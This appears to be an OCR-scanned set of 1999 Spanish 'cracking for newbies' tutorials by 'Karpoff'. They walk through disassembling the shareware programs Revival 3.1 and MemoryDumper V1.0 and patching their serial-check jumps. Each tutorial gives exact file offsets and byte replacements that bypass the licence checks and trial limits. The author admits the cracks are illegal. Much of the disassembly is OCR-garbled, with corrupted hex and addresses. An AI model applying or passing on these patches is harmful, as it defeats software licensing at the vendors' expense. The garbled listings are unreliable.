cabo de eso se trata, En próximos manuales os enseñare como hacer nosotros los cracks, con 
turbo pascal, si no disponéis de un compilador de pascal en mi web tenéis algunos, incluso 
los originales de borland en su versión 7 y también la 5.5. 


Otro consejo coger cualquier programa y analizarlo con el softice, una y otra vez asta que 
os lo sepáis casi de memoria, no os podéis hacer ni idea de lo que vais a aprender, analizar 
programas también con el Regmon y el Filemon o el del ultimo manual WinX-espose register. 
Etc 


Cualquier Duda, Sugerencia, Critica etc. A 


Email Kf_karpofff(hotmail.com URL: http://welcome.to/karpoff 
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Programa: Revival 3.1 


PROTECCION: Name / Serial 


Descripcion: Programa Para Recuperar archivos borrados. 


Dificultad: PR 


DOWNLOAD : 


http://www.revival2000.com/revflp31.zip 


Herramientas: W32Dasm , Editor Hexadecimal 
CRACKER: karpoff FECHA: 05/09/99 


INTRODUCCION 


HH Tutoríal de Crackeo Para Newbies desde Cero 05/09/99 


Por Karpoff it PROYECTO 8 ¿Hit 


Revival 3.1 ( Existen dos versiones, una para utilizar desde diskett y otra para 
instalar en el disco duro, podemos utilizar cualquiera) 


Hello otra otra vez, a todos los que seguís esta serie de Tutoriales de aprendizaje 
del arte del crackeo, olee ¡!!. Agradezco los Emails tan cariñosos que me enviáis, 
pero no tengo tanto nivel como muchos de vosotros creéis , es mas yo también soy un 
Newbie mas. 


Víctima, la versión 3.1 del Revival. Este programa es una utilidad para recuperar 
archivos borrados o dañados tanto en fat 12, 16, 32. Existen 2 versiones 3.1, una 
parece ser que es para utilizarla desde un diskett y ocupa unos 500KB ( que es la que 
utilizaremos) la otra ocupa 1.1MB y creo que la utilidad en si no aporta nada nuevo 
con respecto a la pequeña. La podéis coger de: 


http://www.revival2000.com/revflp31.zip 


http://www.chollian.net/-ship3/revflp31.zip 


Este programa nos da una Evaluación de 30 días, al inicio nos presenta un típico nag 
para insertar el S/N , y por si fuese poco tenemos una limitación de solo tres 
archivos recuperables por sesión, Que evaluación tan asquerosa solo por eso será 
nuestra víctima je je Je. 


Comportamiento del programa. Al ejecutar el programa nos sale el nag, rellenemos con 
los datos que queramos y pulsamos Register, como era de esperar el típico mensaje de 
The serial Number is invalid. Y si pulsamos cancelar entramos directamente al 
programa, con la limitación de recuperar solo tres archivos. 


Si queréis podéis tracear la ejecución del programa con el regmon, filemon, 
Techfacts, ¿? Para que ¿? Pues para ver donde se guardan los datos del registro, con 
el filemon podemos ver si guarda datos o coge datos de algún archivo que 
desconozcamos etc. Enfinn que siempre es recomendable utilizar todas nuestras 
herramientas para saber lo mas posible sobre el programa, esto nos evitara muchos 
quebraderos de coco. 


Herramientas, W32dasm y un HexEdit, utilizaremos el W32dasm en vez del Softice, 
porque es interesante como actúa este programa, quizás el próximo manual lo haremos 
con el softice y capturaremos su S/N valido. 


| AL ATAKE 


Ataque: A partir del mensaje The serial Number is invalid localizaremos la rutina que 
verifica si es correcto nuestro S/N y la modificaremos en beneficio nuestro. 


Como siempre lo primero hacer una copia de Revival.exe para editarla con el HEXedit, y el 


archivo original lo desensamblamos con el W32dasm. 


Bueno tenemos desensamblado el revival.exe y editado con el Hexedit una copia, 


Que es lo primero que podemos hacer.... en efecto, localizar The serial Number is invalid. 
En el Wdasm para eso pulsamos el botón [strn-ref] esto nos muestra una ventana con todas las 
Cadenas de caracteres ( frases ) que el W32Dasm interpreta como tal. 


Y enseguida la localizamos, ahora hacemos doble clip encima de la frasecita para que nos 
lleve a la parte del código donde de aloja, y aparecemos en 


* Posible Reference to Dialog: DialogID_008A, CONTROL_ID:00FF, "" 


:004068E3 G6AFF push FFFFEFFFE 


:004068E5 6A30 push 00000030 
* Possible Reference to String Resource ID=61215: "The Serial number is invalid" 


:004068E7 681FEF0000 push O0O00EF1F --- Aparecemos AQUÍ 


:004068EC E8A7750300 call 0043DE98 


:004068F1 8BCE mov ecx, esi 


:004068F3 E860AA0200 call 00431358 


como siempre cliquearemos nuevamente sobre The Serial number is invalid por si hubiese mas 
referencias a esta frase, y en efecto volamos asta: 


* Referenced by a (U)nconditional or (C)onditional Jump at Addresses: 


| :00445510 
:00445533 


:00445539 


:0044553F 


* Possible Reference to String Resource ID=61215: 


:00445541 C7071FEF0000 mov dword ptr [edil], 


:00445547 


Que pasa a 


y mirando por encima, 


(C), :00445518(C) 


8DBE90000000 lea edi, dword ptr [esi+00000090] 


81F900FF0000 cmp ecx, 0000FFOO 


7208 Jb 00445549 


EB10 jmp 00445559 


hora por cual empezamos ¿?¿?¿?. 


Se compara o se genera el registro valido, por que ¿? Mirar 


* Posible 


:004068A9 


:004068AE 


:004068B3 


:004068B6 


:004068BC 


StringData Ref from Data Obj ->"Name" 


6814C24500 push 0045C214 


E8BD040000 call 00406D70 


83C408 add esp, 00000008 


8B8614010000 mov eax, dword ptr [esi+00000114] 


50 push eax 


* Possible StringData Ref from Data Obj ->"Company" 


:004068BD 


:004068C2 


:004068C7 


:004068CA 


:004068CC 


680CC24500 push 0045C20C 


E8A9040000 call 00406D70 


83C408 add esp, 00000008 


8B07 mov eax, dword ptr [edi] 


50 push eax 


possible StringData Ref from Data Ob] ->"Serial" 


"The Serial number is invalid" 


0000EF1F ---- Aparecemos AQUI 


Veamos que hay alrededor en la primera referencia 
nos encontramos con el código donde posiblemente 


Y ahora veamos que hay alrrededor de la segunda referencia a nuestro mensaje de error ¿¿¿7?7?? 
er nada interesante, creo que lo mas lógico es centrarnos en el código de la 
primera referencia a el mensaje de error. 


a mi parec 


Llegados a 


que le dig 


este punto pensemos, si habéis seguido los otros manuales sabréis que lo primero 
que suelo buscar es un salto después de una comprobación tipo Test eax,eax o call xxXXXXXX, 


a al salto ( Je, jne etc.) 


si de tiene que ejecutar o no , 


dependiendo de si hemos 


acertado con el S/N (numero de serie) o no, este salto debe tener unas características 
como... Si el registro es falso salta a The Serial number is invalid pero si es valido no 
salta y sigue ejecutándose. 


Si os fijáis no existe ninguna Cadena de texto que nos de las gracias cuando el programa es 
registrado correctamente tipo Thank You for register, con lo cual nos imaginaremos que si 
registramos el programa simplemente no mostrara el aviso de error y entraremos directamente 
en el programa, igual os parece una tontería este razonamiento pero creerme que no lo es. 
Bueno pues no se hable mas y a analizar el código que hay encima de la primera referencia a 
The Serial number is invalid 


Bueno a buscar el salto magico, nos centramos en al primera referencia a The Serial number 
is invalid. y Teniamos lo siguiente. 


:0040687E 8BCF mov ecx, edi 


:00406880 E8D9F00200 call 0043595E 


:00406885 50 push eax 


:00406886 E815CAFFFF call 004032A0 


:0040688B 83C404 add esp, 00000004 


:0040688E 85C0 test eax, eax 


:00406890 7451 je 004068E3 


:00406892 C7465C01000000 mov [esi+5C], 00000001 


:00406899 83BE2001000000 cmp dword ptr [esi+00000120], 00000000 


:004068A0 7438 je 004068DA 


:004068A2 8B8618010000 mov eax, dword ptr [esi+00000118] 


:004068A8 50 push eax 


* Possible StringData Ref from Data Obj ->"Name" 


:004068A9 6814C24500 push 0045C214 


:004068AE E8BD0O40000 call 00406D70 


:004068B3 83C408 add esp, 00000008 


:004068B6 8B8614010000 mov eax, dword ptr [esi+00000114] 


:004068BC 50 push eax 


* Possible StringData Ref from Data Obj ->"Company" 


:004068BD 680CC24500 push 0045C20C 


:004068C2 E8A9040000 call 00406D70 


:004068C7 83C408 add esp, 00000008 


:004068CA 8B07 mov eax, dword ptr [edi] 


:004068CC 50 push eax 


* Possible StringData Ref from Data Obj ->"Serial" 


:004068CD 6804C24500 push 0045C204 


:004068D2 E899040000 call 00406D70 


:004068D7 83C408 add esp, 00000008 


* Referenced by a (U)nconditional or (C)onditional Jump at Address: 


:004068A0 (C) 


:004068DA 8BCE mov ecx, esi 


:004068DC E85EAA0200 call 0043133F 


:004068E1 EB15 jmp 004068F8 


* Referenced by a (U)nconditional or (C)onditional Jump at Address: 


| :00406890(C) 


* Possible Reference to Dialog: DialogID_008A, CONTROL_ID:00FF, "" 


:004068E3 G6AFF push FFFEFFFEFF 


:004068E5 6A30 push 00000030 


* Possible Reference to String Resource ID=61215: "The Serial number is invalid" 


:004068E7 681FEF0000 push 0000EF1F -— Aparecemos Aqui 


:004068EC E8A7750300 call 0043DE98 


:004068F1 8BCE mov ecx, esi 


:004068F3 E860AA0200 call 00431358 


Pues vemos que un poco mas arriba de donde estamos hay un salto precedido de una llamada 


:004068DC E85EAA0200 call 0043133F 


:004068E1l EB15 Jjmp 004068F8 salto incondicional 


Primero nos fijamos la direccion a la que apunta este salto jmp 004068F8 veis que si este 
salto se ejecuta se pasaría el mensaje de Invalid con lo cual no nos podría imprimir "The 
Serial number is invalid" y por si quedase alguna duda encima es un salto Incondiciona ósea 
que salta de todas todas, no importa el valor que le asigne call 0043133F saltara por 
cojones, deducciones... esto no es lo que buscamos, sigamos hacia arriba y enseguida vemos 
otro salto. 


:00406899 83BE2001000000 cmp dword ptr [esi+00000120], 00000000 


:004068A0 7438 je 004068DA 


Este ya no es un salto incondicional, saltara o no saltara dependiendo del valor que le 
asigne la comparación que tiene arriba, Pero si os fijáis en la dirección a la que puede 
saltar nunca llegaría a The Serial number is invalid ya que :004068A0 7438 je 004068DA esta 
dirección nos lleva al salto que acabamos de analizar (:004068El EB15 jmp 004068F8) entonces 
si se ejecuta se pasaría el The Serial number is invalid gracias a jmp 004068F8 y no 
imprimiria el mensaje de error 


Lo entendéis.. ¿?,bueno bueno pues a seguir buscando y Justo encima otro salto mas 


:00406886 E8S15CAFFFF call 004032A0 - Comprueba si el reg es correcto 


:0040688B 83C404 add esp, 00000004 


:0040688E 85C0 test eax, eax 


:00406890 7451 Je 004068E3 Nuestro querido salto 


Pues sin lugar a duda este si es :00406890 7451 je 004068E3 como veis si se llegase a 
ejecutar el salto nos manda directos a The Serial number is invalid 


Lo que ocurre aquí es que 00406886 E815CAFFFF call 004032A0 este call va directo a el código 
que genera el S/N, por lo tanto según el S/N que metamos llegara a este call y aquí se 
decide si je 004068E3 se ejecuta o no, y lo que interesa es que no se ejecute, pues de lo 
contrario toma ventanazo con The Serial number is invalid ale vamos a parchearlo, la mejor 
manera de que no se ejecute es eliminándolo. Lo primero localizar el offset de Je 004068E3 
que si miráis en la barra de estado ( abajo ) del W32dasm veréis ROffset 00005C90h y de aqui 
la h no se utiliza y los 4 ceros anteriores no hacen falta ósea 5C90 es nuestro OFFSET 


Vamos al Editor HEX que lo tenemos abierto y con una copia de revival.exe editada 


Y en Goto ponemos la dirección de offset 5C90 aceptamos y nos lleva a 7451 C746 Y lo 
cambiamos por 9090 C746 ya hemos eliminado el salto, si ahora desensamblaríamos la copia de 
revival. Exe y buscamos la dirección donde estaba el salto nos encontraríamos esto 


:00406886 E8S15CAFFFF call 004032A0 - Comprueba si el reg es correcto 


:0040688B 83C404 add esp, 00000004 


:0040688E 85C0 test eax, eax 


:00406890 90 NOP Un byte de el salto 


:00406890 90 NOP y el otro byte 


No nos desviemos del tema ya hemos parcheado ahora salvamos el parcheo de la copia, y la 
ejecutamos para ver si todo es correcto, Run Copia de revival.exe 


Sale el nag rellenamos con los datos, Register y directos al programa miramos en help y han 
desaparecido todo tipo de referencias a registrarnos, si probamos el programa también se ha 
quitado la limitación de solo 3 archivos, ósea que estamos registrados. Cerramos el programa 
y lo ejecutamos nuevamente para ver si se mantiene el registro, pero ooooococohhhh 

desgraciadamente no se mantiene, aunque si metemos los datos nuevamente otra vez registrado. 


Esto suele ocurrir amenudo, Por que creéis que puede ser ¿? 


PENSA 40 00 a AAA IA RARA RA AA AA 60D AA ARA IA A ERRADA RAR Yaa ¿2? Pues parece ser 
que cuando se inicia el programa comprueba nuevamente si estamos registrados, pero como es 
posible, si tenemos parcheado el salto que nos mandaba al Invalid serial entonces o hay otra 
rutina que hace lo mismo o se llama a la misma rutina desde otra parte del programa ( 
Gracias Champion por tus consejos sobre este tema ) recapitulemos. Recordáis que teníamos 
un call que llamaba a una dirección de memoria donde comprobaba si el reg era valido o no y 
según la comprobación hacia que se ejecutase el salto que hemos parcheado o no. 


:00406886 E8S15CAFFFF call 004032A0 - Comprueba si el reg es correcto 


:0040688B 83C404 add esp, 00000004 


:0040688E 85C0 test eax, eax 


:00406890 7451 Je 004068E3 este lo tenemos parcheado 


como estaba comentando o hay otra rutina completa de comprobación ( que no creo, Ya que la 
mayoría de los programadores tienden a la vagancia) o desde otro punto del programa cuando 
este esta empezando a ejecutarse, se hace otra llamada a 004032A0 pues lo mas practico en 
este momento es ir al W32dasm y buscar si hay mas llamadas ha esa dirección de memoria, como 
buscar pues pinchamos el botón de la linterna ( find text ) y escribimos la dirección de 
memoria 004032A0 y nos aparece la primera que es la que ya hemos parcheado volvemos a buscar 
y enseguida nos aparece otra en 


:004117£0 ESBB1AFFFF call 004032A0 á Aquí esta la segunda llamada 


:004117E5 83C404 add esp, 00000004 


:004117E8 8B4DF0O mov ecx, dword ptr [ebp-10] 


:004117EB 85C0 test eax, eax 


:004117ED 7409 je 004117F8á salto hacia las rutinas de error 


:004117EF C7415001000000 mov [ecx+50], 00000001 


:004117F6 EB3D jmp 00411835 


00406886 E815CAFFFF call 004032A0 -> primera llamada == 


004117E0 E8BB1AFFFF call 004032A0 -> segunda llamada == 


Lo veis claramente no un nuevo Call hacia la misma dirección que el otro, por lo tanto una 
solución seria eliminar completamente este call ( siempre y cuando no afecte a otras partes 
del programa ) para eliminarla solo habrá que cambiar en la dirección de offset 10BE0 ------- 
--- E8BB 1AFF FF83 C404 POR 9090 9090 9083 C404 


O si os fijáis tenemos el salto 004117ED 7409 je 004117F8 que si se ejecuta va a las rutinas 
de error (no explicare lo que ocurre si se ejecuta el salto por que entraríamos en detalles 
de ASM y posiblemente os confunda mas ,dado que yo no se ASM) 


Pues eso podéis inutilizar o el call 004032A0 como ya hemos visto o el salto 


004117ED 7409 je 004117F8 que seria cambiar en Offset 10BED 7409 C741 5001 


Por 9090 C741 5001 


Salvamos nuevamente los parcheos y ejecutamos copia de revival.exe y ahora ya no hay ni 
ventanas ni nada referente a registrarnos ha desaparecido la limitación de 3 archivos ósea 
programa petado. :-D 


Os encontrareis con muchos programas que funcionan de esta manera, Ósea que tener en cuenta 
este manual J 


Lo habéis entendido si no ¿? Cualquier duda ya sabéis me dais un toque 


Cualquier Duda, Sugerencia, Critica etc. A 


Email Kf_karpofffhotmail.com URL: http://welcome.to/karpoff 


Un Saludo a TODOS/AS. (Karpoff) 


Este material es solo para uso educativo, por ahora los cracks son ilegales. 


Karpoff Spanish Tutor: Pagina dedicada a la dibulgacion de informacion en Castellano, sobre 


Ingenieria Inversa y Programacion. Email "Colabora con tus Proyectos" 


HH* Tutoríal de Crackeo Para Newbies desde Cero 04/10/99 


Por Karpoff Hi GRUPO KF_CRACK KARPOFF-NEW 98/99 HH 


PROYECTO 13 HH 


MemoryDumper V1.0 


INTRODUCCION. 


Hola a Todos/as, Gracias a todos por el mogollón de emails que he recibido, ha sido 
una sobrada, parece ser que hay mucha peña que todavía el ProcDump es demasiado, 
pedís mas manuales sobre programas en listado muerto. 


A mi parecer el listado muerto lo hemos tocado en casi todos los manuales, pues 
aunque hemos utilizado el ProcDump estos han sido estudiados con el W32dasm, además 
cada dia las protecciones van superándose y Cada vez son menos los programas que 
simplemente se pueden petar con un listado muerto. 


Recordáis el los primeros manuales en los que petamos el StayOn Pro y el Stay On the 
Net, si verdad?? Pues os recomiendo que bajéis la ultima versión de cualquiera de 
ellos y veáis el cambio que han dado, ahora no nos comeríamos nada solo con el 
W32dasm, aparentemente el programa no ha cambiado nada pero ya esta a la ultima moda, 
ejecutable comprimido, protección anti Dasm, anti Debugger y por si fuese poco una 
vez que libras estas protecciones y sacas un listado muerto no puedes atacar 
siguiendo cadenas de caracteres porque cuenta con muy pocas y Casi todas son de este 
estilo 885658 +HH0BRAR. 


El programa que he elegido es una herramienta mas que podremos utilizar cuando 
tengamos mas experiencia se trata de un mapeador de memoria concretamente es Memory 
Dumper V1.0 se puede bajar de: 


http://www. suddendischarge.com/TheFiles/ExecutableTools/memdumpr.zip 


Limitación y comportamiento del programa: el comportamiento del programa es el 
típico, al ejecutarlo nos da la oportunidad de registrarnos o de utilizarlo en 
versión shareware, si intentamos registrarnos y fallamos como es normal nos escupe el 
típico aviso (aunque un poco exagerado) The serial number entered is not valid 


Si pasados 30 dias no hemos registrado o petado el programa este deja de funcionar. 


Ataques y Herramientas: Ataque mediante el aviso The serial number entered is not 
valid analizar el proceso que ha hecho que se imprima ese mensaje de fallo en nuestra 
pantalla y modificar el código en beneficio nuestro, Herramientas simplemente lo que 
me habéis pedido en los emails el W32dasm y un HEX Edit si hay alguien que no 
disponga de estas herramientas en mi web las encontrareis. 


Currando: Primero como siempre hacer una copia del ejecutable memorydumper.exe para 
desensamblar el original y editar con el editor HEX la copia, esta copia podemos 
crearla en el mismo directorio donde esta instalado el original, pero con otro nombre 
por ejemplo Dumper.exe 


Pues a lo dicho desensamblamos el original MemoryDumper.exe Y con el editor HEX 
abrimos la copia Dumper.exe bueno ahora deberíamos ver el listado muerto que nos ha 
hecho el W32dasm y buscar la cadena de caracteres The serial number entered is not 
valid para buscarla solo tenemos que mirar en String Data Refereces pulsando el botón 
[Strg-Ref] y enseguida la localizamos porque hay poquitas frases, bueno vemos tanto 
The serial number entered is not valid como la que nos saldría si el numero de 
registro seria valido Software has bee Registered Sucessfully esto es una muy buena 
noticia ya que seguramente nos facilita la localización de la rutina que tendremos 
que parchear, y por lo general cuanto mas jJuntitas estén menos código a analizar, una 
vez mas mis razonamientos al ver este tipo de características son los siguientes, 


Tenemos las dos referencias una que no dice que la hemos cagado y la otra que nos 
felicita bueno en cualquiera de los dos casos los mensajes se imprimen en nuestras 
pantallas, entonces pensemos que debe de haber una comprobación call test cmp que le 
diga un salto je jne si tiene que felicitarnos o si tiene que escupirnos dependiendo 
de si hemos acertado o fallado, objetivo localizar esas rutinas, Donde pueden estar?? 
Seguramente estarán unas líneas por encima de las cadenas de caracteres (los avisos) 
Porque unas líneas por encima?? Primero imaginamos que si nuestro je jne recibe el 
valor que le indica que el numero de registro no es correcto, este salta directo al 
mensaje de error, dejándose por el camino el mensaje de felicitación, y si el numero 
de registro es correcto pues será al revés el salto je jne no se ejecuta y continua 
con la ejecución normal del programa llegando a el mensaje de felicitaciones y sin 
llegar al mensaje de error. Yo creo que esta muy claro lo que intento explicar. 


Pues entonces hagamos doble clip sobre The serial number entered is not valid para 
ver que parte del código hace que se imprima este aviso, siempre cliqueamos otra vez 
porque en la mayoría de ocasiones hay varias partes del código que llaman al mismo 
aviso, en este caso solo hay una referencia a el mensaje de error, y es en: 


* Reference To: MFC42.O0Ordinal:0C1A, Ord:0C1Ah 


:00402EFD E896030000 Call 00403298 


:00402F02 8D9538FEFFFF lea edx, dword ptr [ebp+FEFFEFFE38] 


:00402F08 52 push edx 


:00402F09 68F0684000 push 004068F0 


:00402F0E ESEDF8FFFF call 00402800 


:00402F13 83C408 add esp, 00000008 


:00402F16 68F0684000 push 004068F0 

:00402F1B E806FBFFFF call 00402426 - RUTINA QUE COMPRUEBA EL REG. 
:00402F20 83C404 add esp, 00000004 

:00402F23 85C0 test eax, eax 

:00402F25 7519 jne 00402F40 -— SALTO SOSPECHOSO 

:00402F27 6A00 push 00000000 

:00402F29 6A00 push 00000000 


* Possible StringData Ref from Data Obj ->"The serial number entered is not "- 
>"valid. | 


:00402F2B 6898654000 push 00406598 --- AQUÍ APARECEMOS 
:00402F30 8B8D34FEFFFF mov ecx, dword ptr [ebp+FFFFFE34] 


Analicemos en 00402f1b hay una llamada, si seguimos esa llamada seguramente nos 
llevara paso a paso a las rutinas que van comprobando los datos que hemos metido, 
según esos datos el retorno(ret) de esa llamada (call) vendrá con un valor que hará 
que el jne de 00402f25 se ejecute o no, como veis si no se ejecuta va directo al 
mensaje de error y si se ejecuta podría llegar el mensaje de felicitaciones que esta 
en 00402fe2 


* Possible StringData Ref from Data Obj ->"Software has been registered sucessfully." 


:00402FE2 68E4674000 push 004067E4 


aunque me temo por experiencia que este salto que tenemos localizado lo único que 
hace si lo partcheamos es mostrarnos el mensaje de felicitaciones, pero sin que el 
programa se mantenga registrado y si hacéis la prueba veréis que tengo razón, [ os 
recomiendo que probéis, quien sabe igual os estoy engañando. Tenéis que hacer que ese 
salto se ejecute :-D) 


Bueno pues si no fuese ese salto analicemos la llamada (call) que parece que se 
encarga del proceso de comprobación, para ello pulsamos sobre 


00402F1B E806FBFFFF call 00402A26 


y sobre el botón que pone [call] esto hará que vallamos a la dirección de memoria 
00402A26 que parece que es donde se comprueba la validez de nuestro numero. 


:00402A26 55 push ebp --CALL nos trae aquí 

:00402A27 8BEC mov ebp, esp 

:00402A29 81EC44010000 sub esp, 00000144 

:00402A2F 56 push esi 

:00402A30 57 push edi 

:00402A31 8B7508 mov esi, dword ptr [ebp+08] 

:00402A34 B950000000 mov ecx, 00000050 

:00402A39 8DBDCOFEFFFF lea edi, dword ptr [ebp+FFFFFECO] 

:00402A3F F3 repz 

:00402A40 A5 movsd 

:00402A41 C785BCFEFFFFO00000000 mov dword ptr [ebp+FEFFFFEBC], 00000000 
:00402A4B EBOF jmp 00402A5C 

* Referenced by a (U)nconditional or (C)onditional Jump at Address: 


| :00402B27 (U) 


:00402A4D 8B8>BCFEFFFF mov eax, dword ptr [ebp+FFFFFEBC] 

:00402A53 83C001 add eax, 00000001 Importante que pase por aqui 
:00402A56 8985BCFEFFFF mov dword ptr [ebp+FEFFFEBC], eax 

* Referenced by a (U)nconditional or (C)onditional Jump at Address: 


| :00402A4B (U) 


:00402A5C 83BDBCFEFFFF40 cmp dword ptr [ebp+FFFFFEBC], 00000040 


:00402A63 0F8DC3000000 3jn1 00402B2C 


:00402A69 


:00402A6F 


:00402A75 


:00402A7C 


:00402A82 


:00402A88 


:00402A8F 


:00402A95 


:00402A9B 


:00402AA2 


:00402AA8 


:00402AAE 


:00402AB5 


:00402ABB 


:00402AC1 


:00402AC8 


:00402ACF 


:00402AD5 


:00402ADC 


:00402AE2 


:00402AE8 


:00402AEF 


:00402AF5 


8B8DBCFEFFFF mov ecx, dword ptr [ebp+FEFFFFEBC] 


8B95DBCFEFFFF mov edx, dword ptr [ebp+FFFFFEBC] 


8A840DDOFEFFFF mov al, byte ptr [ebp+ecx-00000130] 


3282FC464000 xor al, byte ptr [edx+004046FC] 


8B8DBCFEFFFF mov ecx, dword ptr [ebp+FFFFFEBC] 


88840DDOFEFFFF mov byte ptr [ebptecx-00000130], al 


8B95DBCFEFFFF mov edx, dword ptr [ebp+FFFFFEBC] 


8B85BCFEFFFF mov eax, dword ptr [ebp+FEFFFFEBC] 


8A8C1510FFFFFF mov cl, byte ptr [ebp+edx-000000F0] 


3288FC464000 xor cl, byte ptr [eax+004046FC] 


8B95BCEFEFFFF mov edx, dword ptr [ebp+FFFFFEBC] 


888C1510FFFFFF mov byte ptr [ebp+tedx-000000F0], cl 


8B85BCFEFFFF mov eax, dword ptr [ebp+FFFFFEBC] 


8B8DBCFEFFFF mov ecx, dword ptr [ebp+FFFFFEBC] 


8A9405DOFEFFFF mov dl, byte ptr [ebp+eax-00000130] 


32940D10FFFFFF xor dl, byte ptr [ebp+ecx-000000F0] 


8B85BCFEFFFF mov eax, dword ptr [ebp+FFFFFEBC] 


889405DOFEFFFF mov byte ptr [ebpteax-00000130], dl 


8B8DBCFEFFFF mov ecx, dword ptr [ebp+FFFFFEBC] 


8B95BCFEFFFF mov edx, dword ptr [ebp+FEFFFFEBC] 


8A840DDOFEFFFF mov al, byte ptr [ebp+ecx-00000130] 


3282FC464000 xor al, byte ptr [edx+004046FC] 


8B8DBCFEFFFF mov ecx, dword ptr [ebp+FEFFFFEBC] 


:00402AFB 


:00402B02 


:00402B08 


:00402BOA 


:00402B11 


:00402B17 


:00402B19 


:00402B1F 


:00402B21 


:00402B23 


:00402B25 


88840DDOFEFFFF mov byte ptr [ebp+tecx-00000130], al 


8B95BCFEFFFF mov edx, dword ptr [ebp+FEFFFFEBC] 


33C0 xor eax, eax 


8A8415DOFEFFFF mov al, byte ptr [ebp+edx-00000130] 


8B8DBCFEFFFF mov ecx, dword ptr [ebp+FFFFFEBC] 


33D2 xor edx, edx 


8A913C474000 mov dl, byte ptr [ecx+0040473C] 


3BC2 cmp eax, edx 


7404 je 00402B27 - Nuestro Satto. 


33C0 xor eax, eax 


EBOA jmp 00402B31 


* Referenced by a (U)nconditional or (C)onditional Jump at Address: 


| :00402B21 (C) 


:00402B27 


E921FFFFFF jmp 00402A4D -— Tiene que venir aqui 


* Referenced by a (U)nconditional or (C)onditional Jump at Address: 


| :00402A63(C) 


:00402B2C 


B801000000 mov eax, 00000001 


* Referenced by a (U)nconditional or (C)onditional Jump at Address: 


| :00402B25 (U) 


:00402B31 


5F pop edi 


:00402B32 5E pop esi 


:00402B33 8BE5 mov esp, ebp 


:00402B35 5D pop ebp 


:00402B36 C3 ret -— El Retorno de la LLamada 


bueno aquí esta todo desde el comienzo de la llamada (call) asta el retorno (ret) que 
nos devolverá a la siguiente línea después de la llamada, 


análisis hemos aparecido en 00402A26 55 push ebp a partir de aquí lo que ocurre es 
esto, el proceso Se dirige a comprobar el numero que hemos metido, seguramente en 
todas esas instrucciones que hay, se genera el n/s valido y lo compara con el que 
nosotros hemos puesto y dependiendo de lo que obtenga hará que nos registremos o que 
fallemos. Bueno la llamada (call) se va ejecutando, enseguida hay un salto 
incondicional que hará que saltemos 00402A4B EBOF jmp 00402A5C de aquí saltamos a 


00402A5C 83BDBCFEFFFF40 cmp dword ptr [ebp+FFFFFEBC], 00000040 —saltamos aquí 


00402A63 0F8DC3000000 jn1 00402B2C -bifurcación -que no se ejecuta (otro tipo de 
salto) 


Por lógica la bifurcación que tenemos en 00402a63 no se ejecutara ya que tiene que 
generar y comprobar el numero de registro en las instrucciones que le siguen. La 
llamada se sigue ejecutando y llegamos a otro salto en: 


00402B21 7404 je 00402B27 -seguramente este será nuestro salto 


este es un interesante Je que a partir de ahora le llamaremos nuestro salto. veamos 
que hace si nuestro salto se ejecuta, este nos lleva a 


00402B27 E921FFFFFF jmp 00402A4D 


que es otro salto en este caso incondicional (jmp siempre salta) que nos sube casi al 
principio del código de la llamada 


:00402A4D 8B85BCFEFFFF mov eax, dword ptr [ebp+FFFFFEBC]- aquí 


:00402A53 83C001 add eax, 00000001 Importante que pase por aqui 


:00402A56 8985BCFEFFFF mov dword ptr [ebp+FEFFFEBC], eax 


Bueno hemos dicho que pasa si se ejecuta 00402B21 7404 je 00402B27 Pero si no se 
ejecuta que pasa?? Pues fígaros 


:00402B21 7404 je 00402B27 - Nuestro Salto. 


:00402B23 33C0 xor eax, eax 


:00402B25 EBOA jmp 00402B31 -— Otro salto incondicional 


pues si no se ejecuta enseguida llega a el salto incondicional de 00402b25 como 
siempre comento un salto incondicional (jmp) siempre salta a la dirección que indique 
en este Caso a 00402b31 


:00402B31 5F pop edi biene de 00402b25 ( el jmp) 


:00402B32 5E pop esi 


:00402B33 8BE5 mov esp, ebp 


:00402B35 5D pop ebp 


:00402B36 C3 ret -— El Retorno de la Llamada 


ya veis que nos lleva a el retorno, y como este seria el proceso que hace si fallamos 
en el registro debemos modificar algo no?. si el registro falla quiere decir que el 
flag esta a cero, ósea que tiene que haber una forma de que se ponga el flag a l. 
Donde se pone eax a 17? 


:00402A53 83C001 add eax, 00000001 -—- aquí 


00402B2C B801000000 mov eax, 00000001 -—- y aquí 


Pues para que pase por aquí modifiquemos nuestro salto hagamos que salte 


00402B21 7404 je 00402B27 - Nuestro Salto. 


Lo convertimos en un salto incondicional (jmp) Ousease que si lo cambiamos por: 


:00402B21 EBO4 jmp 00402B27 — Nuestro Salto Manipulado. 


Que pasa ahora que hemos convertido el je en un jmp?? Pues que la ejecución del 
programa al llegar a este punto, salta inmediatamente a 


00402B27 E921FFFFFF jmp 00402A4D Que es el salto incondicional (lo hemos visto antes) 
que nos retorna Casi al principio de la llamada (call) que estamos analizando, ahora 
si cojera los valores que nos interesa ya que al saltar llega a: 


:00402A4D 8B85>BCFEFFFF mov eax, dword ptr [ebp+FFFFFEBC] aterriza aqui 


:00402A53 83C001 add eax, 00000001 coje 1 para EAX 


:00402A56 8985BCFEFFFF mov dword ptr [ebp+FEFFFEBC], eax 


Y nuevamente llega a la bifurcación que no se ejecuto en un principio , y ahora si se 
ejecutara ya que ha recogido un 1 para eax, es importante saber que generalmente 


cuando el flag es uno este hace que se ejecute la instrucción tipo je jne jn etc. Y 
cuando es 0 sigue la normal ejecución. 


00402A5C 83BDBCFEFFFF40 cmp dword ptr [ebp+FFFFFEBC], 00000040 
00402A63 0F8DC3000000 jn1 00402B2C —ahora si se ejecuta 

Que nos lleva a 

:00402B2C B801000000 mov eax, 00000001 --— eax a 1 

* Referenced by a (U)nconditional or (C)onditional Jump at Address: 


| :00402B25 (U) 


:00402B31 5F pop edi 

:00402B32 5E pop esi 

:00402B33 8BE5 mov esp, ebp 

:00402B35 5D pop ebp 

:00402B36 C3 ret - El Retorno de la Llamada 
y llega al retorno con el flag a 1 


Bueno coger y analizar todo lo explicado con el código delante, y lo veréis muy 
fácil, si no quizás no entenderéis todo este proceso. 


Solo nos queda aplicar el Patcher que es el siguiente, modificaremos. 


00402B21 7404 Je 00402B27 Por 00402B21 EBO04 3jmp 00402B27. 


Localizamos el offset de este salto que es 2B21 y vamos al editor Hex que lo tenemos 
abierto con una copia del ejecutable MemoryDumper.exe y según el editor que estemos 
utilizando metemos la dirección del offset en buscar y lo que vemos es 


7404 y como he dicho lo cambiamos por EB04 


SALVAMOS LOS CAMBIOS Y TODO CORRECTO. 


Nota: hay varias formas de petar este programa incluso mas fáciles que esta, os 
recomiendo que os repaséis el código, ya que el manual puede contener errores 
intencionados con el único objetivo de que entendáis el proceso que analizamos en 
este programa. 


